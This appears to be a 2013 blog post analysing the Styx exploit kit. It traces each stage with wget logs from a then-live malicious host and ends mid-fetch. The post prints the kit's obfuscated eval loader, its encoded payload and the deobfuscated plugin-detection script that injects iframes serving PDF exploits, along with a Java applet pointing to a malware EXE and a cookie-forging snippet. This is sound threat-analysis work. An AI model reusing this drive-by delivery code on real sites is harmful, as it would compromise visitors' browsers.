Sunday, April 7, 2013

Styx Exploit Kit Analysis - building a bridge to the underworld


Time for another EK adventure. Always fun looking into how these things work.
What to expect: obfuscated JavaScript, JAR's, PDF's and the odd EXE file.
Lets get ready for the fun...

Styx seem to come from Greek mythology and is the name of the river at the border to the underworld (according to wikipedia).


 So lets see if we can build a bridge over to the far side of the underworld... If not we will drown half way.

A Tweet by @IbashBotnets lead me to this one, thanks!

PS!! At the time of publishing: The site is still alive so be careful

1. Start with the redirector



--2013-04-06 hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 302 Found
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Location: hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=3693830346734333836633534663236673267363161656463683267326435343; path=/
  Status: 302
  X-Powered-By: ASP.NET version 4
  Content-Type: text/html; charset=utf-8
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 0
Location: hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/ [following]
--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/
Reusing existing connection to rupscare.org:80.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 472
Length: 472 [text/html]
Saving to: `pane.html'

     0K                                                       100% 25.6M=0s

2013-04-06 (25.6 MB/s) - `pane.html' saved [472/472]



So we got a cute little landing page / gate

html>
<head>
<title>Spvfsgihxh</title>
</head>
<body>
<applet archive="IriBA.jar" code="iIzdFTw.tBAmwo" name="LlfkQbgj">
<param name="CxRAA" value="hxxp: //rupscare.org/f8UENz06Los0sIjA0h5KM11dfM16mOl0dhDI0LoPr0wS3P0vpSB0FdC60KwLL0XazR0I1By0Ftvl0woRa0HMhW0jybx0YczL030IR14y510akqt0btBC0Mlbx16DPl0O0Sm0IPWo03Vp20zsyN0Z5H80IlGk0Uw3f11ZiW0ri5k00zJC0bfMF0nwGj0q4Zx0eHYM0ZMsY/MydDzBPB3b.exe?ftptJ6NyGf0u=nZ&h=11"/>
</applet>
<script src="aDHRYLxXI.js"></script>
</body>
</html>


As so many other EK's straight to the applet. Looks like the link to the EXE is there in bright daylight as well. But lets see what secrets are behind the JavaScript first:


2. Fetching JS: aDHRYLxXI.js


--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/aDHRYLxXI.js
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=2653362373934343136336565313262653369393937366836353537336333366; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 176
Length: 176 [text/html]
Saving to: `aDHRYLxXI.js'

     0K                                                       100% 8.47M=0s

2013-04-06 (8.47 MB/s) - `aDHRYLxXI.js' saved [176/176]



Here is what we got:

var ykskT="p"+"df"+""+"\x78"+"."+"h"+"t"+"\x6dl"+"";
try{
var GyrcZ = LlfkQbgj.bFFvG();
if(GyrcZ.indexOf("rarAjl")<0){
location.href=ykskT;
}
}
catch(e){
location.href=ykskT;
}



Once again redirected, but where; well we have seen worse -> pdfx.html


3. Fetch pdfx.html


--2013-04-06 --  hxxp ://rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/pdfx.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=9373265346564633734316938346334303163636564373462363632373736656; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 618
Length: 618 [text/html]
Saving to: `pdfx.html'

     0K                                                       100% 30.1M=0s

2013-04-06 (30.1 MB/s) - `pdfx.html' saved [618/618]



<html>
<head>
<title>Uhrobayhjyqi</title>
</head>
<body>
<iframe style="display: none;" src="ocll.html" id="hrtuiai"></iframe>
<script>
var Theb=35;function wlxj(){var pXOm='oZUV';kQIqdJ='CAkXtK';if (kQIqdJ=='PXuT') kOhRAH();}function TqeV(){}
var CwjVUE=132;function utPc(){}
var krZBmfUN="&h=32";
</script>
<script>
window.onload=function(){
 ojzcz=document.getElementById("hrtuiai").contentWindow.document.getElementById("cxhvbb").value;
 pknxmtcs="";
 for(crvm=0;crvm<ojzcz.length;crvm+=2)
  pknxmtcs+=String.fromCharCode(parseInt(ojzcz.substr(crvm,2),26)-135);
 eval(pknxmtcs);
}
</script>
</body>
</html>


An iframe and som more JS. Notice that the JS code references the iframe.

get ocll.html

--2013-04-06 --  hxxp ://rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/ocll.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=8366930393133303532636430373836323362633532366262693031673162693; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 1678
Length: 1678 (1.6K) [text/html]
Saving to: `ocll.html'

     0K .                                                     100% 74.3M=0s

2013-04-06 (74.3 MB/s) - `ocll.html' saved [1678/1678]



<html>
<body>
<h1>
<textarea id="cxhvbb">5f939i9b909h969c9b6b87989h8a7m806j908m9b8o9a926n9j8o999i926n929l918o9m9g6k9o5f9j8o9f6b929l918o9h927e9b929k6b7l8o9h926j6k7c5f929l918o9h9
26p9g929h7l8o9h926j929l918o9h926p94929h7l8o9h926j6k6b6m6b929l918o9m9g6k7c5f9j8o9f6b908m9j8o999i927e929g908o9d926j9j8o999i926k6b6m6b6j6j929l918o9m9g7e7e9b9i99
996k6b7g6b6d6d6b7b6b6d7c6b929l9d969f929g7e6d6m929l918o9h926p9h9c8c8b7k8a9h9f969b946j6k6k7c5f919c909i9a929b9h6p909c9c9896927e908m9b8o9a926b6m6b6d7e6d6b6m6b908
m9j8o999i927c5fa05f9j8o9f6b9m9n879h8f7i80849h6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g926j6k7c5f96936j9m9n879h8f7i80849h6p969b91929l
86936j6d9k9c9k77756d6k7d716b6h6h6b9m9n879h8f7i80849h6p969b91929l86936j6d9a9g96926d6k7f7e716k9o5f87989h8a7m806j6d937o7o958b8o9g918o9g6d6n6b989f8h7j9a938c856n6
b726k7c5f919c909i9a929b9h6p9k9f969h926j6d7d96939f8o9a926b939f8o9a928p9c9f91929f7e6i716i6b9g909f9c9999969b947e6i9b9c6i6b9g9h9m99927e6i9d9c9g969h969c9b7b8o8p9g
9c999i9h927c9h9c9d7b719d9l7c9992939h7b719d9l7c6i6b9g9f907e6i939b9h9g6p959h9a996i7f7d7096939f8o9a927f6d6k7c5fa05f9j8o9f6b8a9d99969h859i9a7e939i9b909h969c9b6j9
g9h9f6k9o5f9j8o9f6b9f929h7e8i8k7c5f9j8o9f6b9g9d997e9g9h9f6p9g9d99969h6j708i8j6p8j8m6n6o8k70946k7c5f939c9f6j967e717c967d757c966m6m6k9o5f96936j9h9m9d929c936b9g
9d998i968k6c7e6d9i9b919293969b92916d6k9o9f929h8i968k7e9g9d998i968k7ca092999g929o9f929h8i968k7e6d716d7ca05fa05f9f929h9i9f9b6b9f929h6p979c969b6j6d6d6k7c5fa07c5
f9j8o9f6b7o929h859i9a7e939i9b909h969c9b6j9g9h9f6k9o5f9h9f9m9o5f9f929h9i9f9b6b8a9d99969h859i9a6j9g9h9f6p9a8o9h90956j708i8j918k8i8j918j6p8j8m6n6o8k6l706k6p979c
969b6j6d6d6k6k5fa0908o9h90956j906k9oa07c5f9f929h9i9f9b6b6d6d7c5fa07c5f9j8o9f6b7o929h8791938d929f9g969c9b7e939i9b909h969c9b6j6k9o5f96936j9b8o9j96948o9h9c9f6p9
d999i94969b9g6b6h6h6b9b8o9j96948o9h9c9f6p9d999i94969b9g6p99929b949h957f716k9o5f9j8o9f6b9d999i94969b858o9a926b7e6b9b8o9j96948o9h9c9f6p9d999i94969b9g8i6d7i919c
8p926b7i909f9c8p8o9h6d8k7c5f96936j6c9d999i94969b858o9a926k6b9f929h9i9f9b6b6d6d7c5f9j8o9f6b9d91938m9j929f8m9j929f9g969c9b7e7o929h859i9a6j9d999i94969b858o9a926
p9j929f9g969c9b6k7c5f9j8o9f6b9d91938m9j929f8m91929g909f969d9h969c9b7e7o929h859i9a6j9d999i94969b858o9a926p91929g909f969d9h969c9b6k7c5f9j8o9f6b9d91938m9j929f8m
9a969a927e6d6d7c5f96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d9996908o9h969c9b709j9b916p8o919c8p926p9d91939l9a996d8k6k9o9d91938m9j929f8m9a969a927e6
d7a6p716p716p716d7ca092999g929o96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d9996908o9h969c9b709j9b916p8o919c8p926p9l6o9a8o9f9g6d8k6k9o9d91938m9j929f
8m9a969a927e6d796p716p716p716d7ca0a07c5f96936j9d91938m9j929f8m9j929f9g969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m9j929f9g969c9b7c5fa05f92999g926b96936
j9d91938m9j929f8m91929g909f969d9h969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m91929g909f969d9h969c9b6b7c5fa05f92999g926b9o5f9f929h9i9f9b6b7o929h859i9a6j
9d91938m9j929f8m9a969a926k7c5fa05fa092999g929o5f9j8o9f6b91969j8m9c8p976b7e6b919c909i9a929b9h6p909f928o9h927m99929a929b9h6j6d91969j6d6k7c5f919c909i9a929b9h6p8
p9c919m6p8o9d9d929b917k959699916j91969j8m9c8p976k7c5f91969j8m9c8p976p969b9b929f7p8b84836b7e6b6i7d867j817m7k8b6b96916b7e6b6d87919387999i94868p976d6b9b8o9a927e
6d87919387999i94868p976d6b7k837i8a8a807l7e6d90999g96917b7k7i797i7a7879716o7379717l6o72727k7n6o7i73757l6o7575757676747675717171716d6b8e807l8b7p7e6d716d6b7p7m8
07o7p8b7e6d716d7f7d70867j817m7k8b7f6i7c5f9h9f9m9o5f9f929h9i9f9b6b7o929h859i9a6j87919387999i94868p976p7o929h8d929f9g969c9b9g6j6k6k7c5fa0908o9h90956j906k9o9f92
9h9i9f9b6b6d6d7ca07c5fa05fa05f9d91939j929f6b7e6b7o929h8791938d929f9g969c9b6j6k7c5f96936j9d91939j929f6c7e6d6d6k5f9d91939j929f7e9d8o9f9g92809b9h6j9d91939j929f6
k7c5f92999g926b9d91939j929f7e717c5f939i9b909h969c9b6b97869b968p9a8c6j6k6b9o5f9j8o9f6b9i8o6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g92
6j6k7c5f96936b6j9i8o6p969b91929l86936j6d9k969b6d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5fa05f939i9b909h969c9b6b8a8a829i7l6j6k9o5f96936j9b8o9j96948
o9h9c9f6p9i9g929f7i94929b9h6p969b91929l86936j6d7k959f9c9a926d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5fa05f939i9b909h969c9b6b98998d7l8d987p896j9f84
9h817p9a929g9d6k6b9o5f9j8o9f6b9d96939f6b7e6b919c909i9a929b9h6p909f928o9h927m99929a929b9h6j6d96936d6m6d9f8o6d6m6d9a926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h9
26j6i9k96919h956i6n6b72716k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i95929694959h6i6n6b72746k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9h9m99926i6n6b6d9h9c
9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9f906i6n6b9f849h817p9a929g9d6k7c5f919c909i9a929b9h6p8p9c919
m6p8o9d9d929b917k959699916j9d96939f6k7c5fa05f96936b6j97869b968p9a8c6j6k6b6h6h6b6c8a8a829i7l6j6k6k6b9o5f96936b6j6j9d91939j929f7f7e797171716b6h6h6b9d91939j929f
7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k5f98998d7l8d987p896j6d8f9k8g7j8a7o9687886p9d91936d6k7c5f96936b6j9d91939j9
29f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b797171716k5f98998d7l8d987p896j6d9l8a8p7o889d6p9d91936d6k7c5f96936b6j6c6j6j9d91939j929f7f7e797171716b6h6h6b9d9193
9j929f7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k6b6h6h6b6c6j9d91939j929f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b7
97171716k6k5f9g929h8b969a929c9i9h6j6d919c909i9a929b9h6p9k9f969h926j6i7d96939f8o9a926b9g9h9m99927e8j6d9h9c9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h928j
6d6b9g9f907e8j6d979c9j936p959h9a998j6d7f7d7096939f8o9a927f6i6k6d6n747171716k7c5fa05f</textarea>
</h1>
</body>
</html>



Just a storage for the variable cxhvbb. Input to generate some more code.

node-js is one of my friends to deobfuscate JS code. First clean the code a bit and then run the code with node. Always nice to pipe it to js-beautify to get nice and shiny code out.

Here is the JavaScript code to run in node:

var1="5f939i9b9O9h969c9b6b87989h8a7m8O6j9O8m9b8o9a926n9j8o999i926n929l918o9m9g6k9o5f9j8o9f6b929l918o9h927e9b929k6b7l8o9h926j6k7c5f929l918o9h926p9g929h7l8o9h926j929l918o9h926p94929h7l8o9h926j6k6b6m6b929l918o9m9g6k7c5f9j8o9f6b9O8m9j8o999i927e929g9O8o9d926j9j8o999i926k6b6m6b6j6j929l918o9m9g7e7e9b9i99996k6b7g6b6d6d6b7b6b6d7c6b929l9d969f929g7e6d6m929l918o9h926p9h9c8c8b7k8a9h9f969b946j6k6k7c5f919c9O9i9a929b9h6p9O9c9c9896927e9O8m9b8o9a926b6m6b6d7e6d6b6m6b9O8m9j8o999i927c5faO5f9j8o9f6b9m9n879h8f7i8O849h6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g926j6k7c5f96936j9m9n879h8f7i8O849h6p969b91929l86936j6d9k9c9k77756d6k7d716b6h6h6b9m9n879h8f7i8O849h6p969b91929l86936j6d9a9g96926d6k7f7e716k9o5f87989h8a7m8O6j6d937o7o958b8o9g918o9g6d6n6b989f8h7j9a938c856n6b726k7c5f919c9O9i9a929b9h6p9k9f969h926j6d7d96939f8o9a926b939f8o9a928p9c9f91929f7e6i716i6b9g9O9f9c9999969b947e6i9b9c6i6b9g9h9m99927e6i9d9c9g969h969c9b7b8o8p9g9c999i9h927c9h9c9d7b719d9l7c9992939h7b719d9l7c6i6b9g9f9O7e6i939b9h9g6p959h9a996i7f7d7O96939f8o9a927f6d6k7c5faO5f9j8o9f6b8a9d99969h859i9a7e939i9b9O9h969c9b6j9g9h9f6k9o5f9j8o9f6b9f929h7e8i8k7c5f9j8o9f6b9g9d997e9g9h9f6p9g9d99969h6j7O8i8j6p8j8m6n6o8k7O946k7c5f939c9f6j967e717c967d757c966m6m6k9o5f96936j9h9m9d929c936b9g9d998i968k6c7e6d9i9b919293969b92916d6k9o9f929h8i968k7e9g9d998i968k7caO92999g929o9f929h8i968k7e6d716d7caO5faO5f9f929h9i9f9b6b9f929h6p979c969b6j6d6d6k7c5faO7c5f9j8o9f6b7o929h859i9a7e939i9b9O9h969c9b6j9g9h9f6k9o5f9h9f9m9o5f9f929h9i9f9b6b8a9d99969h859i9a6j9g9h9f6p9a8o9h9O956j7O8i8j918k8i8j918j6p8j8m6n6o8k6l7O6k6p979c969b6j6d6d6k6k5faO9O8o9h9O956j9O6k9oaO7c5f9f929h9i9f9b6b6d6d7c5faO7c5f9j8o9f6b7o929h8791938d929f9g969c9b7e939i9b9O9h969c9b6j6k9o5f96936j9b8o9j96948o9h9c9f6p9d999i94969b9g6b6h6h6b9b8o9j96948o9h9c9f6p9d999i94969b9g6p99929b949h957f716k9o5f9j8o9f6b9d999i94969b858o9a926b7e6b9b8o9j96948o9h9c9f6p9d999i94969b9g8i6d7i919c8p926b7i9O9f9c8p8o9h6d8k7c5f96936j6c9d999i94969b858o9a926k6b9f929h9i9f9b6b6d6d7c5f9j8o9f6b9d91938m9j929f8m9j929f9g969c9b7e7o929h859i9a6j9d999i94969b858o9a926p9j929f9g969c9b6k7c5f9j8o9f6b9d91938m9j929f8m91929g9O9f969d9h969c9b7e7o929h859i9a6j9d999i94969b858o9a926p91929g9O9f969d9h969c9b6k7c5f9j8o9f6b9d91938m9j929f8m9a969a927e6d6d7c5f96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d99969O8o9h969c9b7O9j9b916p8o919c8p926p9d91939l9a996d8k6k9o9d91938m9j929f8m9a969a927e6d7a6p716p716p716d7caO92999g929o96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d99969O8o9h969c9b7O9j9b916p8o919c8p926p9l6o9a8o9f9g6d8k6k9o9d91938m9j929f8m9a969a927e6d796p716p716p716d7caOaO7c5f96936j9d91938m9j929f8m9j929f9g969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m9j929f9g969c9b7c5faO5f92999g926b96936j9d91938m9j929f8m91929g9O9f969d9h969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m91929g9O9f969d9h969c9b6b7c5faO5f92999g926b9o5f9f929h9i9f9b6b7o929h859i9a6j9d91938m9j929f8m9a969a926k7c5faO5faO92999g929o5f9j8o9f6b91969j8m9c8p976b7e6b919c9O9i9a929b9h6p9O9f928o9h927m99929a929b9h6j6d91969j6d6k7c5f919c9O9i9a929b9h6p8p9c919m6p8o9d9d929b917k959699916j91969j8m9c8p976k7c5f91969j8m9c8p976p969b9b929f7p8b84836b7e6b6i7d867j817m7k8b6b96916b7e6b6d87919387999i94868p976d6b9b8o9a927e6d87919387999i94868p976d6b7k837i8a8a8O7l7e6d9O999g96917b7k7i797i7a7879716o7379717l6o72727k7n6o7i73757l6o7575757676747675717171716d6b8e8O7l8b7p7e6d716d6b7p7m8O7o7p8b7e6d716d7f7d7O867j817m7k8b7f6i7c5f9h9f9m9o5f9f929h9i9f9b6b7o929h859i9a6j87919387999i94868p976p7o929h8d929f9g969c9b9g6j6k6k7c5faO9O8o9h9O956j9O6k9o9f929h9i9f9b6b6d6d7caO7c5faO5faO5f9d91939j929f6b7e6b7o929h8791938d929f9g969c9b6j6k7c5f96936j9d91939j929f6c7e6d6d6k5f9d91939j929f7e9d8o9f9g928O9b9h6j9d91939j929f6k7c5f92999g926b9d91939j929f7e717c5f939i9b9O9h969c9b6b97869b968p9a8c6j6k6b9o5f9j8o9f6b9i8o6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g926j6k7c5f96936b6j9i8o6p969b91929l86936j6d9k969b6d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5faO5f939i9b9O9h969c9b6b8a8a829i7l6j6k9o5f96936j9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p969b91929l86936j6d7k959f9c9a926d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5faO5f939i9b9O9h969c9b6b98998d7l8d987p896j9f849h817p9a929g9d6k6b9o5f9j8o9f6b9d96939f6b7e6b919c9O9i9a929b9h6p9O9f928o9h927m99929a929b9h6j6d96936d6m6d9f8o6d6m6d9a926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9k96919h956i6n6b72716k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i95929694959h6i6n6b72746k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9h9m99926i6n6b6d9h9c9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9f9O6i6n6b9f849h817p9a929g9d6k7c5f919c9O9i9a929b9h6p8p9c919m6p8o9d9d929b917k959699916j9d96939f6k7c5faO5f96936b6j97869b968p9a8c6j6k6b6h6h6b6c8a8a829i7l6j6k6k6b9o5f96936b6j6j9d91939j929f7f7e797171716b6h6h6b9d91939j929f7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k5f98998d7l8d987p896j6d8f9k8g7j8a7o9687886p9d91936d6k7c5f96936b6j9d91939j929f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b797171716k5f98998d7l8d987p896j6d9l8a8p7o889d6p9d91936d6k7c5f96936b6j6c6j6j9d91939j929f7f7e797171716b6h6h6b9d91939j929f7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k6b6h6h6b6c6j9d91939j929f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b797171716k6k5f9g929h8b969a929c9i9h6j6d919c9O9i9a929b9h6p9k9f969h926j6i7d96939f8o9a926b9g9h9m99927e8j6d9h9c9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h928j6d6b9g9f9O7e8j6d979c9j936p959h9a998j6d7f7d7O96939f8o9a927f6i6k6d6n747171716k7c5faO5f"

var Theb=35;function wlxj(){var pXOm='oZUV';kQIqdJ='CAkXtK';if (kQIqdJ=='PXuT') kOhRAH();}function TqeV(){}
var CwjVUE=132;function utPc(){}
var krZBmfUN="&h=32";
        ojzcz=var1;
        pknxmtcs="";
        for(crvm=O;crvm<ojzcz.length;crvm+=2)


4. Say hello to the Plugin Detector unit of Styx


function PktSEI(c_name, value, exdays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
    document.cookie = c_name + "=" + c_value;
}
var yzPtXAIMt = navigator.userAgent.toLowerCase();
if (yzPtXAIMt.indexOf("wow64") < 0 && yzPtXAIMt.indexOf("msie") >= 0) {
    PktSEI("fGGhTasdas", krZBmfUN, 1);
    document.write("<iframe frameborder='0' scrolling='no' style='position:absolute;top:0px;left:0px;' src='fnts.html'></iframe>");
}
var SplitNum = function(str) {
        var ret = [];
        var spl = str.split(/[\.\_,-]/g);
        for (i = 0; i < 4; i++) {
            if (typeof spl[i] != "undefined") {
                ret[i] = spl[i];
            } else {
                ret[i] = "0";
            }
        }
        return ret.join("");
    };
var GetNum = function(str) {
        try {
            return SplitNum(str.match(/[\d][\d\.\_,-]*/).join(""))
        } catch (c) {};
        return "";
    };
var GetPdfVersion = function() {
        if (navigator.plugins && navigator.plugins.length > 0) {
            var pluginName = navigator.plugins["Adobe Acrobat"];
            if (!pluginName) return "";
            var pdf_ver_version = GetNum(pluginName.version);
            var pdf_ver_description = GetNum(pluginName.description);
            var pdf_ver_mime = "";
            if (navigator.mimeTypes["application/vnd.adobe.pdfxml"]) {
                pdf_ver_mime = "9.0.0.0";
            } else {
                if (navigator.mimeTypes["application/vnd.adobe.x-mars"]) {
                    pdf_ver_mime = "8.0.0.0";
                }
            };
            if (pdf_ver_version != "") {
                return pdf_ver_version;
            } else if (pdf_ver_description != "") {
                return pdf_ver_description;
            } else {
                return GetNum(pdf_ver_mime);
            }
        } else {
            var div_obj = document.createElement("div");
            document.body.appendChild(div_obj);
            div_obj.innerHTML = '<OBJECT id = "PdfPlugObj" name="PdfPlugObj" CLASSID="clsid:CA8A9780-280D-11CF-A24D-444553540000" WIDTH="0" HEIGHT="0"></OBJECT>';
            try {
                return GetNum(PdfPlugObj.GetVersions());
            } catch (c) {
                return "";
            };
        }
    }
pdfver = GetPdfVersion();
if (pdfver != "") pdfver = parseInt(pdfver);
else pdfver = 0;

function jOnibmU() {
    var ua = navigator.userAgent.toLowerCase();
    if (ua.indexOf("win") >= 0) return 1;
    return 0;
}

function SSKuD() {
    if (navigator.userAgent.indexOf("Chrome") >= 0) return 1;
    return 0;
}

function klVDVkHR(rMtJHmesp) {
    var pifr = document.createElement("if" + "ra" + "me");
    pifr.setAttribute('width', 10);
    pifr.setAttribute('height', 13);
    pifr.setAttribute('style', "top:100px;position:absolute");
    pifr.setAttribute('src', rMtJHmesp);
    document.body.appendChild(pifr);
}
if (jOnibmU() && !SSKuD()) {
    if ((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9300)) klVDVkHR("XwYBSGiPQ.pdf");
    if (pdfver >= 6000 && pdfver < 8000) klVDVkHR("xSbGQp.pdf");
    if (!((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9300)) && !(pdfver >= 6000 && pdfver < 8000)) setTimeout("document.write('<iframe style=\"top:100px;position:absolute\" src=\"jovf.html\"></iframe>')", 3000);
}


There looks like there is a change in the plugin detect script from plugin detect 0.7.8 to a slimmer more customized one.

Plenty of exploits to look into here it seem:

5. EOT, PDF's and JAR

The PDF filenames finally came out so lets get them first


--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/XwYBSGiPQ.pdf
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=2656631333133303637343939356934613031633362616731643533383832383; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 5267
Length: 5267 (5.1K) [text/html]
Saving to: `XwYBSGiPQ.pdf'

     0K .....                                                 100% 1.29M=0.004s

2013-04-06  (1.29 MB/s) - `XwYBSGiPQ.pdf' saved [5267/5267]

--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/xSbGQp.pdf
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=5603236336331366163353933356264326263663938313561633832343131656; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 3601
Length: 3601 (3.5K) [text/html]
Saving to: `xSbGQp.pdf'

     0K ...                                                   100% 99.1M=0s

2013-04-06  (99.1 MB/s) - `xSbGQp.pdf' saved [3601/3601]



Now lets see whats behind fnts.html.
PS cookie needed. 402 reply if the landing is not visited again.

Javascript to generate cookie values:

c_name="fGGhTasdas";
value="krZBmfUN";
var exdate = new Date();
    exdate.setDate(exdate.getDate() + 1);
    var c_value = escape(value) + ((1 == null) ? "" : "; expires=" + exdate.toUTCString());
  console.log(c_value);



--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/fnts.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
